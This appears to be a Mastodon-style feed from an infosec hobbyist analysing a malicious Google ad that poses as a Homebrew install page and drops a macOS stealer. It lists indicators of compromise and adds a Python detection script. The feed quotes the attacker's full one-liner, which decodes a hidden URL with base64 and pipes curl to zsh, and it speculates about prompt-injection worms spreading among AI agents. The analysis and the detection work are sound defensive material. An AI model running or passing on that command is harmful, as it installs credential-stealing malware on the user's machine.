
Developer at a cybersecurity startup.

Infosec hobbyist, hope that one day I'll actually be able to contribute.

Rarely complete projects (ask me about my honeypot, or pippin)

Twitter: https://twitter.com/fauxeccles
GH: https://github.com/faux-eccles
Pronouns: he/him

Seems like slab has been used a bit here and there for this campaign using various compromised ads accounts
https://adstransparency.google.com/?region=anywhere&platform=SEARCH&query=Homebrew+for+Mac&domain=slab.com

Huge amount of different ads accounts, all following similar approaches, oldest ad might be March 22nd

Interesting addendum about the advertiser https://adstransparency.google.com/advertiser/AR08935176312499208193?origin=ata&region=anywhere

I suspect it could be a compromised ads account; that being said, I can't actually find this ad listed in the transparency page.

A more sane and parseable list of indicators:

Landing page

httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7

Loaders

httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197
httpX://datasphere.us[.]com/debug/payload.applescript?build=492f9e58358e8e2bc9e0414fa077e197

Mocked User Agent for curls

Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36

APIs

httpX://datasphere.us[.]com/api/debug/event # initial info gathering
httpX://datasphere.us[.]com/gate # stealer upload location
httpX://datasphere.us[.]com/gate/chunk # large file uploads
httpX://datasphere.us[.]com/api/bot/heartbeat # Persistence heartbeat API

api key 61cb9c3bd1a2faa7d6613dd8e5d09e79fe95e85ab09ed6bcd6406badff5a083f

#osx #stealer #iocs

Absolute state of google, (and frankly the expectations of developers for installing things).

Setting up an older Mac to use as a new work machine, search google for brew Mac looking for the brew.sh site, first result is a sponsored link to httpX://macdev.slab[.]com/public/posts/insta-іі-with-termina-і-g40n4aau?shr=6etwxr0gksp2ltctcqv7gom7. I know it's not right but I got curious, let's see what's inside.

The first link is the familiar install instructions we're used to for brew: "here, copy-paste this code into terminal, don't ask questions". *Don't actually do this*

echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" && curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh


Aww man that base64 makes me feel good and trusting, wonder what's inside

echo 'aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=' | base64 -d | cat

httpX://datasphere.us[.]com/debug/loader.sh?build=492f9e58358e8e2bc9e0414fa077e197


hrmm, that's not brew, oh well maybe this is fine, let's check it out with urlscan, looks like me and 5 of my closest friends have had the same idea
https://urlscan.io/result/019d298d-3b24-7571-a37a-12575ae1eb84/

Another base64 blob, that truly gives me the warm and fuzzies, I'm starting to think maybe it's not brew https://pastebin.com/5cr5Nh1W
VirusTotal thinks this new blob might be a stealer https://www.virustotal.com/gui/file/54043cd8874e0eabbced73e433cfa30c75fd45364ae4f03fbda2eabca9d8d994?nocache=1

This blob grabs some basic info then pulls an osa script which appears to be the friends we made along the way (stealer)
https://www.virustotal.com/gui/file/f02758a235a220f2fa125bb6f45a49e674fd8b91f320a382e8b7017d93afbc74

Pastebin doesn't like the script so won't upload it there, can reach out if a copy is needed, but seems to be pretty well indexed

#osx #malware #stealer #google #brew
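As an added example (not the author's code, and not part of the original posts), here is a small Python triage check a defender could run over shell history or EDR process command-line telemetry. It does what the post above did by hand: it finds base64 literals in a command, decodes them, pulls out any URL that was only visible after decoding, and matches hostnames against the indicator domains listed in the IOC post. The indicator set is taken from the posts (defanging removed); the sample commands are constructed for the test, the malicious one being the one-liner quoted above and the benign curl-to-shell one being the published Homebrew installer command.

```python
import base64
import binascii
import re
from urllib.parse import urlparse

# Indicator domains from the posts above, with the defanging brackets removed.
IOC_DOMAINS = {"datasphere.us.com", "macdev.slab.com"}

# A run of base64 alphabet long enough to carry a URL, with optional padding.
B64_LITERAL_RE = re.compile(r"[A-Za-z0-9+/]{16,}={0,2}")
URL_RE = re.compile(r"https?://[^\s'\"<>|)]+")
# `... | zsh` / `| bash` / `| sh` pipe-to-shell, and the `$(curl ...)` subshell form.
PIPE_TO_SHELL_RE = re.compile(r"\|\s*(?:sudo\s+)?(?:zsh|bash|sh)\b")
SUBSHELL_CURL_RE = re.compile(r"\$\(\s*curl\b")
B64_DECODE_RE = re.compile(r"\bbase64\s+(?:-d|-D|--decode)\b")


def decode_b64_literals(command):
    """Return the decoded text of every base64 literal in `command` that is valid
    base64 and decodes to printable ASCII (binary blobs are ignored)."""
    decoded = []
    for match in B64_LITERAL_RE.finditer(command):
        try:
            raw = base64.b64decode(match.group(0), validate=True)
        except (binascii.Error, ValueError):
            continue  # not real base64 (e.g. a hex hash or a path fragment)
        if raw and all(32 <= b < 127 for b in raw):
            decoded.append(raw.decode("ascii"))
    return decoded


def analyze_command(command):
    """Triage one shell command line from history or process telemetry."""
    decoded = decode_b64_literals(command)
    hidden_urls = [u for text in decoded for u in URL_RE.findall(text)]
    visible_urls = URL_RE.findall(command)
    hosts = {h for h in (urlparse(u).hostname for u in visible_urls + hidden_urls) if h}

    findings = {
        "pipe_to_shell": bool(PIPE_TO_SHELL_RE.search(command) or SUBSHELL_CURL_RE.search(command)),
        # A URL that only appears after decoding a base64 literal fed to `base64 -d`.
        "hidden_url_via_base64": bool(B64_DECODE_RE.search(command) and hidden_urls),
        "hidden_urls": hidden_urls,
        "ioc_hits": sorted(hosts & IOC_DOMAINS),
    }
    if findings["ioc_hits"] or findings["hidden_url_via_base64"]:
        findings["verdict"] = "block"
    elif findings["pipe_to_shell"]:
        findings["verdict"] = "review"  # curl-to-shell is common but worth a look
    else:
        findings["verdict"] = "allow"
    return findings


# Constructed sample inputs: the one-liner from the fake brew page quoted above,
# the published Homebrew installer command, and an ordinary command.
SAMPLE_COMMANDS = {
    "fake_brew": (
        'echo "Downloading Update: https://support.apple.com/downloads/xprotect-remediator-150.dmg" '
        '&& curl -s $(echo "aHR0cHM6Ly9kYXRhc3BoZXJlLnVzLmNvbS9kZWJ1Zy9sb2FkZXIuc2g/'
        'YnVpbGQ9NDkyZjllNTgzNThlOGUyYmM5ZTA0MTRmYTA3N2UxOTc=" | base64 -d) | zsh'
    ),
    "real_brew": '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"',
    "benign": "ls -la ~/Downloads",
}

if __name__ == "__main__":
    for label, cmd in SAMPLE_COMMANDS.items():
        print(label, analyze_command(cmd))
```

The point of the three samples is the caveat: plain curl-to-shell is not a useful signal on its own, because the genuine Homebrew installer is exactly that and lands in "review". What separates the fake page's command is the URL being hidden behind `base64 -d` and the decoded host matching the indicator list, which is what pushes it to "block".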

that's right! it goes in the DOWNLOADS folder

this is an interesting article about LLM generated code (an sqlite rewrite in rust) and the difference between "it works" and "it's good". also interesting database stuff :)

https://blog.katanaquant.com/p/your-llm-doesnt-write-correct-code

Your LLM Doesn't Write Correct Code. It Writes Plausible Code.


RE: https://social.coop/@cwebber/116178050263113242

openclaw basically already provides the platform for this, tho the blast radius is going to be inherently limited by the way in which llm instructions get corrupted; the "game of telephone" situation will mutate the botnet into unpredictable behavior fairly quickly, I expect.

RE: https://infosec.exchange/@catsalad/116186492239907316

This has just made me have a berenstein bear moment I think.

I remember ages ago there was a novelty shirt that had functional code to break some form of copyright protection/drm, and it was labeled something like this shirt is illegal.

I was thinking it would be neat to have new shirts in the same vein that directed people to *nix distributions without age verification.

But now I can't find examples of the shirt I'm thinking of, all "this shirt is illegal" results that I can find are some persecuted Christianity message.

RE: https://mastodon.social/@knoppix95/116178259499310735

How long until the first agent-based prompt injection worm? This level of non-deterministic self evaluating/constructing behavior would make tracking and identifying rogue agents pretty difficult I think?

I remember reading years and years ago about polymorphism in self replicating malware and this just seems ripe for abuse

as a civilization, we need to pool our efforts away from GenAI and into a more useful technology. Specifically, time travel that will let me make out with myself.